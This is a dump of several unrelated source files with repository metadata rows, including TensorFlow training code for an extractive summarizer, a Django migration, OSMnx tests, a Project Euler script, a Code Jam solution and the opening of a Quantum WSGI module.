# logits_argmin = tf.expand_dims(logits_argmin, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# # Convert argmin and argmax to labels, works only if FLAGS.target_label_size = 2
# labels = tf.concat(2, [logits_argmin, logits_argmax]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# dtype = tf.float16 if FLAGS.use_fp16 else tf.float32
# labels = tf.cast(labels, dtype)
# labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# # softmax_cross_entropy_with_logits
# cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
# cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# if FLAGS.weighted_loss:
# cross_entropy = tf.mul(cross_entropy, weights)
# return cross_entropy
# def weighted_cross_entropy_loss(logits, future_rewards, actual_reward, weights):
# """Optimizing expected reward: Weighted cross entropy
# args:
# logits: Logits without softmax. [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
# actual_reward: [FLAGS.batch_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# """
# with tf.variable_scope('WeightedCrossEntropyLoss') as scope:
# # Get Weights: External reward - Predicted reward
# actual_reward = tf.reshape(tf.tile(actual_reward, [FLAGS.max_doc_length]),[-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# diff_act_pred = future_rewards - actual_reward # actual_reward - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Reshape logits for argmax and argmin
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# # Get labels if predicted using these logits
# logits_argmax = tf.argmax(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
# logits_argmax = tf.reshape(logits_argmax, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# logits_argmax = tf.expand_dims(logits_argmax, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# logits_argmin = tf.argmin(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
# logits_argmin = tf.reshape(logits_argmin, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# logits_argmin = tf.expand_dims(logits_argmin, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# # Convert argmin and argmax to labels, works only if FLAGS.target_label_size = 2
# labels = tf.concat(2, [logits_argmin, logits_argmax]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# dtype = tf.float16 if FLAGS.use_fp16 else tf.float32
# labels = tf.cast(labels, dtype)
# labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# # softmax_cross_entropy_with_logits
# cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
# cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# if FLAGS.weighted_loss:
# cross_entropy = tf.mul(cross_entropy, weights)
# # Multiply with reward
# cross_entropy = tf.mul(cross_entropy, diff_act_pred)
# # Cross entroy / document
# cross_entropy = tf.reduce_sum(cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
# cross_entropy_mean = tf.reduce_mean(cross_entropy, name='crossentropy')
# tf.add_to_collection('reward_cross_entropy_loss', cross_entropy_mean)
# # # # The total loss is defined as the cross entropy loss plus all of
# # # # the weight decay terms (L2 loss).
# # # return tf.add_n(tf.get_collection('losses'), name='total_loss')
# return cross_entropy_mean
### Training functions
def train_cross_entropy_loss(cross_entropy_loss):
""" Training with Gold Label: Pretraining network to start with a better policy
Args: cross_entropy_loss
"""
with tf.variable_scope('TrainCrossEntropyLoss') as scope:
optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# Compute gradients of policy network
policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# print(policy_network_variables)
grads_and_vars = optimizer.compute_gradients(cross_entropy_loss, var_list=policy_network_variables)
# print(grads_and_vars)
# Apply Gradients
return optimizer.apply_gradients(grads_and_vars)
def train_meansq_loss(futreward_meansq_loss):
""" Training with Gold Label: Pretraining network to start with a better policy
Args: futreward_meansq_loss
"""
with tf.variable_scope('TrainMeanSqLoss') as scope:
optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# Compute gradients of Future reward estimator
futreward_estimator_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="FutureRewardEstimator")
# print(futreward_estimator_variables)
grads_and_vars = optimizer.compute_gradients(futreward_meansq_loss, var_list=futreward_estimator_variables)
# print(grads_and_vars)
# Apply Gradients
return optimizer.apply_gradients(grads_and_vars)
def train_neg_expectedreward(reward_weighted_cross_entropy_loss_multisample):
"""Training with Policy Gradient: Optimizing expected reward
args:
reward_weighted_cross_entropy_loss_multisample
"""
with tf.variable_scope('TrainExpReward') as scope:
optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# Compute gradients of policy network
policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# print(policy_network_variables)
# Compute gradients of policy network
grads_and_vars = optimizer.compute_gradients(reward_weighted_cross_entropy_loss_multisample, var_list=policy_network_variables)
# print(grads_and_vars)
# Clip gradient: Pascanu et al. 2013, Exploding gradient problem
grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars]
# Apply Gradients
# return optimizer.apply_gradients(grads_and_vars)
return optimizer.apply_gradients(grads_and_vars_capped_norm)
# def train_neg_expectedreward(reward_weighted_cross_entropy_loss):
# """Training with Policy Gradient: Optimizing expected reward
# args:
# reward_weighted_cross_entropy_loss
# """
# with tf.variable_scope('TrainExpReward') as scope:
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# # Compute gradients of policy network
# policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# # print(policy_network_variables)
# # Compute gradients of policy network
# grads_and_vars = optimizer.compute_gradients(reward_weighted_cross_entropy_loss, var_list=policy_network_variables)
# # print(grads_and_vars)
# # Clip gradient: Pascanu et al. 2013, Exploding gradient problem
# grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars]
# # Apply Gradients
# # return optimizer.apply_gradients(grads_and_vars)
# return optimizer.apply_gradients(grads_and_vars_capped_norm)
# def train_neg_expectedreward(logits, d_ltheta_ot):
# """Training with Policy Gradient: Optimizing expected reward
# args:
# logits: Logits without softmax. [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# d_ltheta_ot: Placeholder [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# """
# with tf.variable_scope('TrainExpReward') as scope:
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# # Modify logits with d_ltheta_ot
# logits = tf.mul(logits, d_ltheta_ot)
# # Compute gradients of policy network
# policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# # print(policy_network_variables)
# # Compute gradients of policy network
# grads_and_vars = optimizer.compute_gradients(logits, var_list=policy_network_variables)
# # print(grads_and_vars)
# # Clip gradient: Pascanu et al. 2013, Exploding gradient problem
# grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars]
# # Apply Gradients
# # return optimizer.apply_gradients(grads_and_vars)
# return optimizer.apply_gradients(grads_and_vars_capped_norm)
# def temp_train_neg_expectedreward(logits, d_ltheta_ot):
# with tf.variable_scope('TempTrainExpReward') as scope:
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# # Modify logits with d_ltheta_ot
# logits = tf.mul(logits, d_ltheta_ot)
# # Compute gradients of policy network
# policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# # print(policy_network_variables)
# # Compute gradients of policy network
# grads_and_vars = optimizer.compute_gradients(logits, var_list=policy_network_variables)
# grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars]
# grads_and_vars_capped_val = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in grads_and_vars]
# # tf.clip_by_norm(t, clip_norm, axes=None, name=None)
# # https://www.tensorflow.org/versions/r0.11/api_docs/python/train/gradient_clipping
# return grads_and_vars, grads_and_vars_capped_norm, grads_and_vars_capped_val
### Accuracy Calculations
def accuracy(logits, labels, weights):
"""Estimate accuracy of predictions
Args:
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
labels: Sentence extraction gold levels [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Returns:
Accuracy: Estimates average of accuracy for each sentence
"""
with tf.variable_scope('Accuracy') as scope:
logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
correct_pred = tf.equal(tf.argmax(logits,1), tf.argmax(labels,1)) # [FLAGS.batch_size*FLAGS.max_doc_length]
correct_pred = tf.reshape(correct_pred, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
correct_pred = tf.cast(correct_pred, tf.float32)
# Get Accuracy
accuracy = tf.reduce_mean(correct_pred, name='accuracy')
if FLAGS.weighted_loss:
correct_pred = tf.multiply(correct_pred, weights)
correct_pred = tf.reduce_sum(correct_pred, reduction_indices=1) # [FLAGS.batch_size]
doc_lengths = tf.reduce_sum(weights, reduction_indices=1) # [FLAGS.batch_size]
correct_pred_avg = tf.div(correct_pred, doc_lengths)
accuracy = tf.reduce_mean(correct_pred_avg, name='accuracy')
return accuracy
# Improve it to show exact accuracy (top three ranked ones), not all.
| [
"zxzxzxzxz803@naver.com"
] | zxzxzxzxz803@naver.com |
21a5bab623131e69766e639509e8c1e67a713fe7 | d9eae6dd43848c50bdecc1fba5b7197c0e91fbf3 | /ituro_website/post/migrations/0016_auto_20170219_1934.py | 7ba2857c8c081fb8ff6bc5083cf79c62174c9b10 | [
"MIT"
] | permissive | Batuortal/ituro_website | 38045c7ad2ffe288fe1bd9ce2a5dd4304251c678 | f63948b99a03245c905a0cc9318e9509c91175e8 | refs/heads/master | 2021-01-01T19:09:41.871036 | 2017-07-27T12:15:19 | 2017-07-27T12:15:19 | 98,529,284 | 2 | 0 | null | 2017-07-27T11:43:52 | 2017-07-27T11:43:52 | null | UTF-8 | Python | false | false | 472 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2017-02-19 19:34
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('post', '0015_categoryentry_path_model'),
]
operations = [
migrations.AlterField(
model_name='categoryentry',
name='path_model',
field=models.TextField(blank=True, null=True),
),
]
| [
"celaleddinhidayetoglu@gmail.com"
] | celaleddinhidayetoglu@gmail.com |
4a196cd4f4e92e6b42f9a4e0df6489a41ad1cdfe | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/1/c8n.py | a152200db7ea0c68b8daebb0c4d24d5fe2909fef | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'c8N':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
c1ac35f44e1b4a931797c9c87f2211e02c94e183 | c121241726b54e75741e48467807d14281fd0dc8 | /tests/__init__.py | 316a1b52b2401b80b87659829eaac537eb53a205 | [] | no_license | zeikomi552/githubapi-python-sample | fe44b7bd12af713cdf51125e42d022ea2f4d0d1e | 70d75fab654e343a20e80a2b391341176276ba1a | refs/heads/master | 2022-12-09T11:07:04.494279 | 2020-09-05T09:19:15 | 2020-09-05T09:19:15 | 286,598,982 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85 | py | import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..')) | [
"68983834+zeikomi552@users.noreply.github.com"
] | 68983834+zeikomi552@users.noreply.github.com |
f01a21e3061792d927357110f3970d7c03ba9050 | 8ed86b8e9c451abcb2ce0ddf2f2067c11f3993d8 | /tests/test_osmnx.py | 33ec027e2986a7c620183d88cd5c271556bd3600 | [
"MIT"
] | permissive | surfcao/osmnx | 65830096c21b8353a536f776dfedba7de20eac4c | 51c9addb42425657fa6b11c7442f79f10b9e3e22 | refs/heads/master | 2021-01-19T23:32:40.068378 | 2017-04-19T20:22:01 | 2017-04-19T20:22:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,082 | py | """
OSMnx tests
-----------
"""
import matplotlib as mpl
mpl.use('Agg') #use agg backend so you don't need a display on travis-ci
import os, shutil
if os.path.exists('.temp'):
shutil.rmtree('.temp')
import osmnx as ox, logging as lg
ox.config(log_console=True, log_file=True, use_cache=True,
data_folder='.temp/data', logs_folder='.temp/logs', imgs_folder='.temp/imgs', cache_folder='.temp/cache')
ox.log('test debug', level=lg.DEBUG)
ox.log('test info', level=lg.INFO)
ox.log('test warning', level=lg.WARNING)
ox.log('test error', level=lg.ERROR)
def test_imports():
import json, math, sys, os, io, ast, unicodedata, hashlib, re, random, time, warnings, datetime as dt, logging as lg
from collections import OrderedDict, Counter
from itertools import groupby, chain
from dateutil import parser as date_parser
import requests, numpy as np, pandas as pd, geopandas as gpd, networkx as nx, matplotlib.pyplot as plt, matplotlib.cm as cm
from matplotlib.collections import LineCollection
from shapely.geometry import Point, LineString, Polygon, MultiPolygon
from shapely import wkt
from shapely.ops import unary_union
from descartes import PolygonPatch
from rtree.index import Index as RTreeIndex
def test_gdf_shapefiles():
city = ox.gdf_from_place('Manhattan, New York City, New York, USA')
city_projected = ox.project_gdf(city, to_crs={'init':'epsg:3395'})
ox.save_gdf_shapefile(city_projected)
city = ox.gdf_from_place('Manhattan, New York City, New York, USA', buffer_dist=100)
ox.plot_shape(city)
def test_network_saving_loading():
G = ox.graph_from_place('Piedmont, California, USA')
G_projected = ox.project_graph(G)
ox.save_graph_shapefile(G_projected)
ox.save_graphml(G_projected)
G2 = ox.load_graphml('graph.graphml')
gdf_edges = ox.graph_to_gdfs(G, nodes=False, edges=True, fill_edge_geometry=False)
gdf_nodes, gdf_edges = ox.graph_to_gdfs(G, nodes=True, edges=True, node_geometry=True, fill_edge_geometry=True)
G3 = ox.gdfs_to_graph(gdf_nodes, gdf_edges)
def test_get_network_methods():
import geopandas as gpd
north, south, east, west = 37.79, 37.78, -122.41, -122.43
G1 = ox.graph_from_bbox(north, south, east, west, network_type='drive_service')
G1 = ox.graph_from_bbox(north, south, east, west, network_type='drive_service', truncate_by_edge=True)
location_point = (37.791427, -122.410018)
bbox = ox.bbox_from_point(location_point, project_utm=True)
G2 = ox.graph_from_point(location_point, distance=750, distance_type='bbox', network_type='drive')
G3 = ox.graph_from_point(location_point, distance=500, distance_type='network')
G4 = ox.graph_from_address(address='350 5th Ave, New York, NY', distance=1000, distance_type='network', network_type='bike')
places = ['Los Altos, California, USA', {'city':'Los Altos Hills', 'state':'California'}, 'Loyola, California']
G5 = ox.graph_from_place(places, network_type='all', clean_periphery=False)
calif = gpd.read_file('examples/input_data/ZillowNeighborhoods-CA')
mission_district = calif[(calif['CITY']=='San Francisco') & (calif['NAME']=='Mission')]
polygon = mission_district['geometry'].iloc[0]
G6 = ox.graph_from_polygon(polygon, network_type='walk')
def test_stats():
location_point = (37.791427, -122.410018)
G = ox.graph_from_point(location_point, distance=500, distance_type='network')
stats1 = ox.basic_stats(G)
stats1 = ox.basic_stats(G, area=1000)
stats2 = ox.extended_stats(G, connectivity=True, anc=True, ecc=True, bc=True, cc=True)
def test_plots():
G = ox.graph_from_place('Piedmont, California, USA', network_type='drive', simplify=False)
G2 = ox.simplify_graph(G, strict=False)
nc = ox.get_node_colors_by_attr(G2, 'osmid')
ec = ox.get_edge_colors_by_attr(G2, 'length')
fig, ax = ox.plot_graph(G, save=True, file_format='png')
G_simplified = ox.simplify_graph(G)
fig, ax = ox.plot_graph(G_simplified, show=False, save=True, close=True, file_format='svg')
G_projected = ox.project_graph(G_simplified)
fig, ax = ox.plot_graph(G_projected)
fig, ax = ox.plot_graph(G_projected, fig_height=5, fig_width=5, margin=0.05, axis_off=False, bgcolor='y',
file_format='png', filename='x', dpi=180, annotate=True, node_color='k', node_size=5,
node_alpha=0.1, node_edgecolor='b', node_zorder=5, edge_color='r', edge_linewidth=2,
edge_alpha=0.1, use_geom=False, show=False, save=True, close=True)
fig, ax = ox.plot_figure_ground(G=G_simplified, file_format='png')
fig, ax = ox.plot_figure_ground(point=(33.694981, -117.841375), file_format='png')
fig, ax = ox.plot_figure_ground(address='Denver, Colorado, USA', file_format='png')
def test_routing_folium():
import networkx as nx
G = ox.graph_from_address('N. Sicily Pl., Chandler, Arizona', distance=800, network_type='drive')
origin = (33.307792, -111.894940)
destination = (33.312994, -111.894998)
origin_node = ox.get_nearest_node(G, origin)
destination_node = ox.get_nearest_node(G, destination)
route = nx.shortest_path(G, origin_node, destination_node)
attributes = ox.get_route_edge_attributes(G, route, 'length')
fig, ax = ox.plot_graph_route(G, route, save=True, filename='route', file_format='png')
fig, ax = ox.plot_graph_route(G, route, origin_point=origin, destination_point=destination,
save=True, filename='route', file_format='png')
graph_map = ox.plot_graph_folium(G, popup_attribute='name')
route_map = ox.plot_route_folium(G, route)
def test_buildings():
gdf = ox.buildings_from_place(place='Piedmont, California, USA')
gdf = ox.buildings_from_address(address='San Francisco, California, USA', distance=300)
fig, ax = ox.plot_buildings(gdf)
| [
"gboeing@berkeley.edu"
] | gboeing@berkeley.edu |
1b2adbb82307321e2b0c0359cdf5b60612158d7c | 58d90b4e18d004db0148dbf9a8b8cf9f56e850aa | /build/lib/more/viz_helper/plot_corr.py | 389bb649238ba3996735d77b65a65d4679a313f1 | [
"MIT"
] | permissive | ngupta23/more | bacd831c6e0ba62dd97977c547f211c995077046 | c8d867d280c5c88be7d1ddfac37ff670a2dcaa29 | refs/heads/master | 2020-06-18T12:16:40.655308 | 2019-08-26T09:29:19 | 2019-08-26T09:29:19 | 196,301,026 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 588 | py | import matplotlib.pyplot as plt
import seaborn as sns
def plot_corr(data, figsize=None, xrot=0, yrot=0):
"""
corr_mat: Correlation matrix to visualize
figsize: Overall figure size for the overall plot
xrot: (Default = 0) Rotate x-labels
yrot: (Default = 0) Rotate y-labels
"""
fig, axis = plt.subplots(1, 1, figsize=figsize)
corr_mat = data.corr()
sns.heatmap(round(corr_mat, 2), annot=True, cmap='RdBu', vmin=-1, vmax=1)
axis.set_xticklabels(axis.get_xticklabels(), rotation=xrot)
axis.set_yticklabels(axis.get_yticklabels(), rotation=yrot)
| [
"mywork.ng@gmail.com"
] | mywork.ng@gmail.com |
3c658b334f17c2ae83c718925f6c72f06ada900a | 9c48cc39d149e20bf0c25fae8029043ab43f8f06 | /recipes/tensorflow/samples/tensorflow/perceptron/samples/tensorflow/scorer.py | d51a992348c28fb52dcbe01c0fd9d4fa5869a858 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | DalavanCloud/experience-platform-dsw-reference | b4b6dd363b6fe6ed638db12d7e890af5e4f934dd | 2e0af85a47ec05b7cda77d61954c1cde0a625f5c | refs/heads/master | 2020-04-29T12:36:16.806332 | 2019-03-12T09:55:33 | 2019-03-12T09:55:33 | 176,142,668 | 1 | 0 | NOASSERTION | 2019-03-17T18:26:31 | 2019-03-17T18:26:31 | null | UTF-8 | Python | false | false | 1,518 | py | #
# Copyright 2017 Adobe.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from ml.runtime.tensorflow.Interfaces.AbstractScorer import AbstractScorer
import tensorflow as tf
import numpy
class Scorer(AbstractScorer):
def score(self, config={}):
print("Executed scorer 2")
print(config["modelPATH"])
print(config["logsPATH"])
with tf.Session() as sess:
saver = tf.train.import_meta_graph(config["modelPATH"]+'/my_test_model-1000.meta')
saver.restore(sess, tf.train.latest_checkpoint(config["modelPATH"]+'/'))
graph = tf.get_default_graph()
# Testing example, as requested (Issue #2)
test_X = numpy.asarray([6.83, 4.668, 8.9, 7.91, 5.7, 8.7, 3.1, 2.1])
X = tf.placeholder("float")
W = graph.get_tensor_by_name("weight:0")
b = graph.get_tensor_by_name("bias:0")
pred = tf.add(tf.multiply(X, W), b)
p = sess.run(pred,feed_dict={X:test_X})
print(p)
| [
"jlancar@adobe.com"
] | jlancar@adobe.com |
4fafbbfa074b3066c6e1510ea7acc4fff364b959 | 69c62b9e23a350bd97947b58e341d5e031956b2f | /in_progress/377.py | 7f2ae307b9d7b3d6b6f9b9b2f2fc4dfd4b6ef92a | [] | no_license | g-d-l/project_euler | 756fce982d7a3d44f8391bebcf04d2f368223a9a | 00b6c26afd96d5a849fe49ef0048bace1de634b6 | refs/heads/master | 2021-01-10T11:13:15.127212 | 2016-01-05T02:04:56 | 2016-01-05T02:04:56 | 49,035,504 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,759 | py | def digit_sum(n):
result = 0
while n > 0:
d = n % 10
result += d
n = n // 10
return result
def no_zero(n):
if '0' in str(n):
return False
else:
return True
n = 9
grid = [[0 for x in range(n)] for y in range(n)]
for i in xrange(111111111, -1, -1):
if no_zero(i) and digit_sum(i) == n:
x = i
c = n - 1
while x > 0:
grid[x % 10 - 1][c] += 1
c -= 1
x //= 10
for r in grid:
print(r)
'''
13
1, 12, 67, 232, 562, 1024, 1486, 1816, 1981, 2033, 2040, 2040, 2040,
0, 1, 11, 56, 176, 386, 638, 848, 968, 1013, 1021, 1021, 1021,
0, 0, 1, 10, 46, 130, 256, 382, 466, 502, 511, 511, 511,
0, 0, 0, 1, 9, 37, 93, 163, 219, 247, 255, 256, 256,
0, 0, 0, 0, 1, 8, 29, 64, 99, 120, 127, 128, 128,
0, 0, 0, 0, 0, 1, 7, 22, 42, 57, 63, 64, 64,
0, 0, 0, 0, 0, 0, 1, 6, 16, 26, 31, 32, 32,
0, 0, 0, 0, 0, 0, 0, 1, 5, 11, 15, 16, 16,
0, 0, 0, 0, 0, 0, 0, 0, 1, 4, 7, 8, 8,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
12
1, 11, 56, 176, 386, 638, 848, 968, 1013, 1021, 1021, 1021,
0, 1, 10, 46, 130, 256, 382, 466, 502, 511, 511, 511,
0, 0, 1, 9, 37, 93, 163, 219, 247, 255, 256, 256,
0, 0, 0, 1, 8, 29, 64, 99, 120, 127, 128, 128,
0, 0, 0, 0, 1, 7, 22, 42, 57, 63, 64, 64,
0, 0, 0, 0, 0, 1, 6, 16, 26, 31, 32, 32,
0, 0, 0, 0, 0, 0, 1, 5, 11, 15, 16, 16,
0, 0, 0, 0, 0, 0, 0, 1, 4, 7, 8, 8,
0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 4, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
11
[1, 10, 46, 130, 256, 382, 466, 502, 511, 511, 511]
[0, 1, 9, 37, 93, 163, 219, 247, 255, 256, 256]
[0, 0, 1, 8, 29, 64, 99, 120, 127, 128, 128]
[0, 0, 0, 1, 7, 22, 42, 57, 63, 64, 64]
[0, 0, 0, 0, 1, 6, 16, 26, 31, 32, 32]
[0, 0, 0, 0, 0, 1, 5, 11, 15, 16, 16]
[0, 0, 0, 0, 0, 0, 1, 4, 7, 8, 8]
[0, 0, 0, 0, 0, 0, 0, 1, 3, 4, 4]
[0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 2]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
10
[1, 9, 37, 93, 163, 219, 247, 255, 256, 256]
[0, 1, 8, 29, 64, 99, 120, 127, 128, 128]
[0, 0, 1, 7, 22, 42, 57, 63, 64, 64]
[0, 0, 0, 1, 6, 16, 26, 31, 32, 32]
[0, 0, 0, 0, 1, 5, 11, 15, 16, 16]
[0, 0, 0, 0, 0, 1, 4, 7, 8, 8]
[0, 0, 0, 0, 0, 0, 1, 3, 4, 4]
[0, 0, 0, 0, 0, 0, 0, 1, 2, 2]
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
9
[1, 8, 29, 64, 99, 120, 127, 128, 128]
[0, 1, 7, 22, 42, 57, 63, 64, 64]
[0, 0, 1, 6, 16, 26, 31, 32, 32]
[0, 0, 0, 1, 5, 11, 15, 16, 16]
[0, 0, 0, 0, 1, 4, 7, 8, 8]
[0, 0, 0, 0, 0, 1, 3, 4, 4]
[0, 0, 0, 0, 0, 0, 1, 2, 2]
[0, 0, 0, 0, 0, 0, 0, 1, 1]
[0, 0, 0, 0, 0, 0, 0, 0, 1]
'''
| [
"grahamlustiber@gmail.com"
] | grahamlustiber@gmail.com |
47f0c143537b99ffb3e3284dfa05d57756f3b79d | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_1_1_neat/16_1_1_DanielBraithwaite_last_word.py | f312da31370a6413f77cbed11a1a43de2b88ee5d | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 554 | py | def last_word(s):
w = s[0]
for i in range(1,len(s)):
si = ord(w[0])
ei = ord(w[len(w)-1])
ci = ord(s[i])
if ci >= si:
w = s[i] + w
else:
w = w + s[i]
return w
o = open('output.txt', 'w+')
f = open('A-large.in', 'r+')
##f = open('test.txt', 'r+')
N = int(f.readline())
for i in range(N):
s = f.readline().strip()
res = last_word(s)
print(res)
o.write("Case #" + str(i + 1) + ": " + str(res) + "\n")
f.close()
o.close()
| [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
7edd65620a859a56b61c8982fe8c8e7e7b8822cf | e8274f167fd219ef78241ba8ea89e5d5875ed794 | /cloud/quantum/quantum/api/v2/resource.py | 757d20061e74194d59943d327de57d095cd418a3 | [
"Apache-2.0"
] | permissive | virt2x/folsomCloud | 02db0147f7e0f2ab0375faf4f36ca08272084152 | e6fd612dd77f35a72739cf4d4750e9795c0fa508 | refs/heads/master | 2021-01-01T17:26:28.405651 | 2013-10-17T12:36:04 | 2013-10-17T12:36:04 | 13,647,787 | 0 | 1 | null | 2020-07-24T08:25:22 | 2013-10-17T12:10:24 | Python | UTF-8 | Python | false | false | 4,991 | py | # Copyright 2012 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility methods for working with WSGI servers redux
"""
import netaddr
import webob
import webob.dec
import webob.exc
from quantum.common import exceptions
from quantum import context
from quantum.openstack.common import jsonutils as json
from quantum.openstack.common import log as logging
from quantum import wsgi
LOG = logging.getLogger(__name__)
class Request(webob.Request):
"""Add some Openstack API-specific logic to the base webob.Request."""
def best_match_content_type(self):
supported = ('application/json', )
